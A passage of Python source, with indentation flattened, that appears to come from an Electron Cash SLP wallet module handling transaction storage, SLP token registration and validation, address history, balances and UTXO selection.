ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
is called on False return. The callback takes a single translated string
argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
#Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
#token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method is updated for SLP to prevent tokens from being spent
# in normal txn or txns with token_id other than the one specified
def get_addr_utxo(self, address, *, exclude_slp = True):
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False, ):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin != None:
txid = coin[0].split(":")[0]
idx = coin[0].split(":")[1]
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normal remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
continue
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
